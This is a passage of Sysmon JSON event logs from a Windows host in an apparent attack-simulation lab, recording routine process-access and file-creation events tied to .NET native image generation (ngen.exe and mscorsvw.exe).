.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.444\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010CC2F0F00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.444","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010CC2F0F00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.444\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010CC2F0F00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.444","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010CC2F0F00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:37.584\r\nProcessGuid: {41C8662E-228D-5F25-0000-0010CC2F0F00}\r\nProcessId: 4420\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1144-0\\System.IdentityModel.Selectors.dll\r\nCreationUtcTime: 2020-08-01 08:06:37.584","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:37.584","ProcessGuid":"{41C8662E-228D-5F25-0000-0010CC2F0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1144-0\\System.IdentityModel.Selectors.dll","CreationUtcTime":"2020-08-01 08:06:37.584","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.631\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-001072350F00}\r\nTargetProcessId: 1152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.631","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-001072350F00}","TargetProcessId":"1152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.631\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-001072350F00}\r\nTargetProcessId: 1152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.631","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-001072350F00}","TargetProcessId":"1152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.631\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-001072350F00}\r\nTargetProcessId: 1152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.631","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-001072350F00}","TargetProcessId":"1152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.819\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.819","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010D4390F00}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.819\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.819","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010D4390F00}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:37.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:37.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010D4390F00}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
